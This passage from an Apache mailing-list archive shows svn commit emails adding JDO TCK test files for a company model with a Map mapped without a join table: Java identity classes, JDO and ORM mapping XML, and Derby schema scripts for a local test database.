the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)personid; + } + /** + * This class is used to represent the application identifier + * for the <code>Person</code> class. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field represents the identifier for the <code>Person</code> + * class. It must match a field in the <code>Person</code> class in + * both name and type. + */ + public long personid; + + /** + * The required public no-arg constructor. + */ + public Oid() { } + + /** + * Initialize the identifier. + * @param personid The person identifier. + */ + public Oid(long personid) { + this.personid = personid; + } + + public Oid(String s) { personid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + personid;} + + /** */ + public boolean equals(java.lang.Object obj) { + if( obj==null || + !this.getClass().equals(obj.getClass()) ) return( false ); + Oid o = (Oid) obj; + if( this.personid != o.personid ) return( false ); + return( true ); + } + + /** */ + public int hashCode() { + return( (int) personid ); + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( personid < other.personid ) return -1; + if( personid > other.personid ) return 1; + return 0; + } + + } + +} Added: db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo (added) +++ db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo Fri Sep 8 13:37:08 2006 @@ -0,0 +1,97 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<jdo xmlns="http://java.sun.com/xml/ns/jdo/jdo" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/jdo + http://java.sun.com/xml/ns/jdo/jdo_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has application identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Company$Oid"> + <field name="companyid" primary-key="true"/> + <field name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department"/> + </field> + </class> + + <class name="Department" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department$Oid"> + <field name="deptid" primary-key="true"/> + <field name="roles" persistence-modifier="persistent"> + <map key-type="String" + value-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + </class> + + <class name="Employee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Person"> + <field name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + <field name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + </class> + + <class name="FullTimeEmployee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + + <class name="PartTimeEmployee" + identity-type="application" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + + <class name="Person" + identity-type="application" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Person$Oid"> + <field name="personid" primary-key="true"/> + <field name="middlename" default-fetch-group="false"/> + </class> + + <interface name="ICompany" + identity-type="application"> + <property name="companyid" primary-key="true"/> + <property name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IDepartment"/> + </property> + </interface> + + <interface name="IDepartment" + identity-type="application"> + <property name="deptid" primary-key="true"/> + <property name="roles" persistence-modifier="persistent"> + <map key-type="String" + value-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </property> + </interface> + + <interface name="IEmployee" + identity-type="application"> + <property name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IEmployee"/> + </property> + <property name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IEmployee"/> + </property> + </interface> + + <interface name="IFullTimeEmployee" + identity-type="application"/> + + <interface name="IPartTimeEmployee" + identity-type="application"/> + + <interface name="IPerson" + identity-type="application"> + <property name="personid" primary-key="true"/> + <property name="middlename" default-fetch-group="false"/> + </interface> + + </package> +</jdo> Added: db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo (added) +++ db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo Fri Sep 8 13:37:08 2006 @@ -0,0 +1,91 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<jdo xmlns="http://java.sun.com/xml/ns/jdo/jdo" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/jdo + http://java.sun.com/xml/ns/jdo/jdo_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has datastore identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" + identity-type="datastore" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Company$Oid"> + <field name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department"/> + </field> + </class> + + <class name="Department" + identity-type="datastore" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Department$Oid"> + <field name="roles" persistence-modifier="persistent"> + <map key-type="String" + value-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + </class> + + <class name="Employee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Person"> + <field name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + <field name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </field> + </class> + + <class name="FullTimeEmployee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + + <class name="PartTimeEmployee" + identity-type="datastore" + persistence-capable-superclass="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + + <class name="Person" + identity-type="datastore" + objectid-class="org.apache.jdo.tck.pc.companyMapWithoutJoin.Person$Oid"> + <field name="middlename" default-fetch-group="false"/> + </class> + + <interface name="ICompany" + identity-type="datastore"> + <property name="departments" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IDepartment"/> + </property> + </interface> + + <interface name="IDepartment" + identity-type="datastore"> + <property name="roles" persistence-modifier="persistent"> + <map key-type="String" + value-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.Employee"/> + </property> + </interface> + + <interface name="IEmployee" + identity-type="datastore"> + <property name="team" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IEmployee"/> + </property> + <property name="hradvisees" persistence-modifier="persistent"> + <collection element-type="org.apache.jdo.tck.pc.companyMapWithoutJoin.IEmployee"/> + </property> + </interface> + + <interface name="IFullTimeEmployee" + identity-type="datastore"/> + + <interface name="IPartTimeEmployee" + identity-type="datastore"/> + + <interface name="IPerson" + identity-type="datastore"> + <property name="middlename" default-fetch-group="false"/> + </interface> + + </package> +</jdo> Added: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm (added) +++ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm Fri Sep 8 13:37:08 2006 @@ -0,0 +1,145 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<orm xmlns="http://java.sun.com/xml/ns/jdo/orm" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/orm + http://java.sun.com/xml/ns/jdo/orm_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has application identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" table="companies"> + <field name="companyid" column="ID"/> + <field name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </field> + <field name="founded" column="FOUNDEDDATE"/> + <field name="departments" mapped-by="company"/> + </class> + + <class name="Department" table="departments"> + <field name="deptid" column="ID"/> + <field name="name" column="NAME"/> + <field name="company" column="COMPANYID"/> + <!-- field type is Map<String, Employee> --> + <field name="roles" mapped-by="department"> + <key mapped-by="role"/> + </field> + </class> + + <class name="PartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="wage" column="WAGE"/> + </class> + + <class name="FullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="salary" column="SALARY"/> + </class> + + <class name="Employee"> + <inheritance strategy="superclass-table"/> + <field name="hiredate" column="HIREDATE"/> + <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="department" column="DEPARTMENT"> + <foreign-key/> + </field> + <field name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </field> + <field name="manager" column="MANAGER"> + <foreign-key/> + </field> + <field name="mentor" column="MENTOR"> + <foreign-key/> + </field> + <field name="protege" mapped-by="mentor"/> + <field name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </field> + <field name="team" mapped-by="manager"/> + <field name="hradvisees" mapped-by="hradvisor"/> + </class> + + <class name="Person" table="persons"> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <field name="personid" column="PERSONID"/> + <field name="firstname" column="FIRSTNAME"/> + <field name="lastname" column="LASTNAME"/> + <field name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </field> + <field name="birthdate" column="BIRTHDATE"/> + </class> + + <interface name="ICompany" table="companies"> + <property name="companyid" column="ID"/> + <property name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </property> + <property name="founded" column="FOUNDEDDATE"/> + <property name="departments" mapped-by="company"/> + </interface> + + <interface name="IDepartment" table="departments"> + <!-- field type is Map<String, Employee> --> + <property name="roles" mapped-by="dept"> + <key mapped-by="role"/> + </property> + <property name="deptid" column="ID"/> + <property name="name" column="NAME"/> + <property name="company" column="COMPANYID"/> + </interface> + + <interface name="IPartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="wage" column="WAGE"/> + </interface> + + <interface name="IFullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="salary" column="SALARY"/> + </interface> + + <interface name="IEmployee"> + <inheritance strategy="superclass-table"/> + <property name="hiredate" column="HIREDATE"/> + <property name="weeklyhours" column="WEEKLYHOURS"/> + <property name="department" column="DEPARTMENT"> + <foreign-key/> + </property> + <property name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </property> + <property name="manager" column="MANAGER"> + <foreign-key/> + </property> + <property name="mentor" column="MENTOR"> + <foreign-key/> + </property> + <property name="protege" mapped-by="mentor"/> + <property name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </property> + <property name="team" mapped-by="manager"/> + <property name="hradvisees" mapped-by="hradvisor"/> + </interface> + + <interface name="IPerson" table="persons"> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <property name="personid" column="PERSONID"/> + <property name="firstname" column="FIRSTNAME"/> + <property name="lastname" column="LASTNAME"/> + <property name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </property> + </interface> + </package> +</orm> Added: db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm (added) +++ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm Fri Sep 8 13:37:08 2006 @@ -0,0 +1,152 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<orm xmlns="http://java.sun.com/xml/ns/jdo/orm" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://java.sun.com/xml/ns/jdo/orm + http://java.sun.com/xml/ns/jdo/orm_2_0.xsd"> +<!-- +This file contains the schema information when an implementation +has application identity. +--> + <package name="org.apache.jdo.tck.pc.companyMapWithoutJoin"> + + <class name="Company" table="companies"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + + <field name="companyid" column="ID"/> + <field name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </field> + <field name="founded" column="FOUNDEDDATE"/> + <field name="departments" mapped-by="company"/> + </class> + + <class name="Department" table="departments"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <field name="deptid" column="ID"/> + <field name="name" column="NAME"/> + <field name="company" column="COMPANYID"/> + <!-- field type is Map<String, Employee> --> + <field name="roles" mapped-by="department"> + <key mapped-by="role"/> + </field> + </class> + + <class name="PartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="wage" column="WAGE"/> + </class> + + <class name="FullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <field name="salary" column="SALARY"/> + </class> + + <class name="Employee"> + <inheritance strategy="superclass-table"/> + <field name="hiredate" column="HIREDATE"/> + <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="department" column="DEPARTMENT"> + <foreign-key/> + </field> + <field name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </field> + <field name="manager" column="MANAGER"> + <foreign-key/> + </field> + <field name="mentor" column="MENTOR"> + <foreign-key/> + </field> + <field name="protege" mapped-by="mentor"/> + <field name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </field> + <field name="team" mapped-by="manager"/> + <field name="hradvisees" mapped-by="hradvisor"/> + </class> + + <class name="Person" table="persons"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <field name="personid" column="PERSONID"/> + <field name="firstname" column="FIRSTNAME"/> + <field name="lastname" column="LASTNAME"/> + <field name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </field> + <field name="birthdate" column="BIRTHDATE"/> + </class> + + <interface name="ICompany" table="companies"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <property name="companyid" column="ID"/> + <property name="name" column="NAME"> + <column name="NAME" sql-type="VARCHAR"/> + </property> + <property name="founded" column="FOUNDEDDATE"/> + <property name="departments" mapped-by="company"/> + </interface> + + <interface name="IDepartment" table="departments"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <!-- field type is Map<String, Employee> --> + <property name="roles" mapped-by="dept"> + <key mapped-by="role"/> + </property> + <property name="deptid" column="ID"/> + <property name="name" column="NAME"/> + <property name="company" column="COMPANYID"/> + </interface> + + <interface name="IPartTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="wage" column="WAGE"/> + </interface> + + <interface name="IFullTimeEmployee"> + <inheritance strategy="superclass-table"/> + <property name="salary" column="SALARY"/> + </interface> + + <interface name="IEmployee"> + <inheritance strategy="superclass-table"/> + <property name="hiredate" column="HIREDATE"/> + <property name="weeklyhours" column="WEEKLYHOURS"/> + <property name="department" column="DEPARTMENT"> + <foreign-key/> + </property> + <property name="fundingDept" column="FUNDINGDEPT"> + <foreign-key/> + </property> + <property name="manager" column="MANAGER"> + <foreign-key/> + </property> + <property name="mentor" column="MENTOR"> + <foreign-key/> + </property> + <property name="protege" mapped-by="mentor"/> + <property name="hradvisor" column="HRADVISOR"> + <foreign-key/> + </property> + <property name="team" mapped-by="manager"/> + <property name="hradvisees" mapped-by="hradvisor"/> + </interface> + + <interface name="IPerson" table="persons"> + <datastore-identity strategy="identity" column="DATASTORE_IDENTITY"/> + <inheritance strategy="new-table"> + <discriminator strategy="class-name" column="DISCRIMINATOR" + indexed="true"/> + </inheritance> + <property name="personid" column="PERSONID"/> + <property name="firstname" column="FIRSTNAME"/> + <property name="lastname" column="LASTNAME"/> + <property name="middlename"> + <column name="MIDDLENAME" allows-null="true"/> + </property> + </interface> + </package> +</orm> Added: db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql (added) +++ db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql Fri Sep 8 13:37:08 2006 @@ -0,0 +1,69 @@ +-- SchemaType: application identity + +connect 'jdbc:derby:jdotckdb;create=true' user 'tckuser' password 'tckuser'; + +CREATE SCHEMA applicationidentity9; +SET SCHEMA applicationidentity9; + +------------------------- +-- company +------------------------- + +ALTER TABLE departments DROP CONSTRAINT EMP_MO_FK; +ALTER TABLE departments DROP CONSTRAINT DEPTS_COMP_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_DEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_FUNDDEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MANAGER_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MENTOR_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_HRADVISOR_FK; +DROP TABLE persons; +DROP TABLE departments; +DROP TABLE companies; + +CREATE TABLE companies ( + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + FOUNDEDDATE VARCHAR(32) NOT NULL, + CONSTRAINT COMPS_PK PRIMARY KEY (ID) +); + +CREATE TABLE departments ( + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + EMP_OF_THE_MONTH INTEGER, + COMPANYID INTEGER, + DISCRIMINATOR VARCHAR(255), + CONSTRAINT DEPTS_COMP_FK FOREIGN KEY (COMPANYID) REFERENCES companies, + CONSTRAINT DEPTS_PK PRIMARY KEY (ID) +); + +CREATE TABLE persons ( + PERSONID INTEGER NOT NULL, + FIRSTNAME VARCHAR(32) NOT NULL, + LASTNAME VARCHAR(32) NOT NULL, + MIDDLENAME VARCHAR(32), + BIRTHDATE VARCHAR(32) NOT NULL, + DISCRIMINATOR varchar(64) NOT NULL, + EMPID INTEGER NOT NULL, + HIREDATE VARCHAR(32), + WEEKLYHOURS REAL, + DEPARTMENT INTEGER, + FUNDINGDEPT INTEGER, + MANAGER INTEGER, + MENTOR INTEGER, + HRADVISOR INTEGER, + SALARY REAL, + WAGE REAL, + CONSTRAINT PERS_DEPT_FK FOREIGN KEY (DEPARTMENT) REFERENCES departments, + CONSTRAINT PERS_FUNDDEPT_FK FOREIGN KEY (FUNDINGDEPT) + REFERENCES departments, + CONSTRAINT PERS_MANAGER_FK FOREIGN KEY (MANAGER) REFERENCES persons, + CONSTRAINT PERS_MENTOR_FK FOREIGN KEY (MENTOR) REFERENCES persons, + CONSTRAINT PERS_HRADVISOR_FK FOREIGN KEY (HRADVISOR) REFERENCES persons, + CONSTRAINT PERS_PK PRIMARY KEY (PERSONID) +); + +ALTER TABLE departments + ADD CONSTRAINT EMP_MO_FK FOREIGN KEY + (EMP_OF_THE_MONTH) REFERENCES persons(PERSONID); + Added: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql (added) +++ db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Fri Sep 8 13:37:08 2006 @@ -0,0 +1,72 @@ +-- SchemaType: datastore identity + +connect 'jdbc:derby:jdotckdb;create=true' user 'tckuser' password 'tckuser'; + +CREATE SCHEMA datastoreidentity9; +SET SCHEMA datastoreidentity9; + +------------------------- +-- company +------------------------- + +ALTER TABLE departments DROP CONSTRAINT EMP_MO_FK; +ALTER TABLE departments DROP CONSTRAINT DEPTS_COMP_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_DEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_FUNDDEPT_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MANAGER_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_MENTOR_FK; +ALTER TABLE persons DROP CONSTRAINT PERS_HRADVISOR_FK; +DROP TABLE persons; +DROP TABLE departments; +DROP TABLE companies; + +CREATE TABLE companies ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + FOUNDEDDATE VARCHAR(32) NOT NULL, + CONSTRAINT COMPS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); + +CREATE TABLE departments ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + ID INTEGER NOT NULL, + NAME VARCHAR(32) NOT NULL, + EMP_OF_THE_MONTH INTEGER, + COMPANYID INTEGER, + DISCRIMINATOR VARCHAR(255), + CONSTRAINT DEPTS_COMP_FK FOREIGN KEY (COMPANYID) REFERENCES companies, + CONSTRAINT DEPTS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); + +CREATE TABLE persons ( + DATASTORE_IDENTITY INTEGER NOT NULL GENERATED ALWAYS AS IDENTITY, + PERSONID INTEGER NOT NULL, + FIRSTNAME VARCHAR(32) NOT NULL, + LASTNAME VARCHAR(32) NOT NULL, + MIDDLENAME VARCHAR(32), + BIRTHDATE VARCHAR(32) NOT NULL, + DISCRIMINATOR varchar(64) NOT NULL, + EMPID INTEGER NOT NULL, + HIREDATE VARCHAR(32), + WEEKLYHOURS REAL, + DEPARTMENT INTEGER, + FUNDINGDEPT INTEGER, + MANAGER INTEGER, + MENTOR INTEGER, + HRADVISOR INTEGER, + SALARY REAL, + WAGE REAL, + CONSTRAINT PERS_DEPT_FK FOREIGN KEY (DEPARTMENT) REFERENCES departments, + CONSTRAINT PERS_FUNDDEPT_FK FOREIGN KEY (FUNDINGDEPT) + REFERENCES departments, + CONSTRAINT PERS_MANAGER_FK FOREIGN KEY (MANAGER) REFERENCES persons, + CONSTRAINT PERS_MENTOR_FK FOREIGN KEY (MENTOR) REFERENCES persons, + CONSTRAINT PERS_HRADVISOR_FK FOREIGN KEY (HRADVISOR) REFERENCES persons, + CONSTRAINT PERS_PK PRIMARY KEY (DATASTORE_IDENTITY) +); + +ALTER TABLE departments + ADD CONSTRAINT EMP_MO_FK FOREIGN KEY + (EMP_OF_THE_MONTH) REFERENCES persons(PERSONID); + From [email protected] Fri Sep 08 20:37:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 158 invoked from network); 8 Sep 2006 20:37:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 20:37:36 -0000 Received: (qmail 67310 invoked by uid 500); 8 Sep 2006 20:37:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67299 invoked by uid 99); 8 Sep 2006 20:37:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 13:37:36 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 13:37:30 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 8585F1A981A; Fri, 8 Sep 2006 13:37:10 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441641 [1/2] - in /db/jdo/trunk/tck20/src: java/org/apache/jdo/tck/mapping/ java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ jdo/datastoreidentity/org/apache/jdo/tck/pc/... Date: Fri, 08 Sep 2006 20:37:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 8 13:37:08 2006 New Revision: 441641 URL: http://svn.apache.org/viewvc?view=rev&rev=441641 Log: JDO-193 Test for Map without join table Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestMap.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactory.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryAbstractImpl.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryConcreteClass.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMClass.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMInterface.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryRegistry.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyModelReader.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/ICompany.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IDepartment.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IFullTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPartTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/IPerson.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/jdo/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/jdo/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestMap.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestMap.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestMap.java (added) +++ 